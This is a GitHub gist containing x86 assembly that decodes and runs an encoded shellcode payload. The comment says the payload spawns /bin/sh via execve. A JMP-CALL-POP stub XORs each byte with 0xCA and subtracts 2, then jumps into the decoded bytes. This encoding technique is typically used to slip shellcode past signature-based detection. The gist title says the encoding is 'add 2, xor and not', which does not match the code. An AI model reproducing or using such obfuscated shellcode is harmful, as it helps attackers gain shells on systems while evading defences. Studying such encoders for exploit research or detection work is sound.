Last active
February 9, 2017 21:53
-
-
Save Sinkmanu/812dc5dbc8fe1703fd8ca57bc9df68e2 to your computer and use it in GitHub Desktop.
Shellcode encoded with add 2, xor and not
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; /bin/sh execv encoded with XOR and SUB | |
| global _start | |
| section .text | |
| _start: | |
| jmp short call_decoder | |
| decoder: | |
| pop esi | |
| xor ecx, ecx | |
| mov cl, 25 | |
| decode: | |
| xor byte [esi], 0xCA | |
| sub byte [esi], 0x2 | |
| inc esi | |
| loop decode | |
| jmp short Shellcode | |
| call_decoder: | |
| call decoder | |
| Shellcode: db 0xf9,0x08,0x98,0xa0,0xba,0xfb,0xbf,0xa0,0xa0,0xfb,0xfb,0xae,0xa1,0x41,0x2f,0x98,0x41,0x2e,0x9f,0x41,0x29,0x78,0xc7,0x05,0x48 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment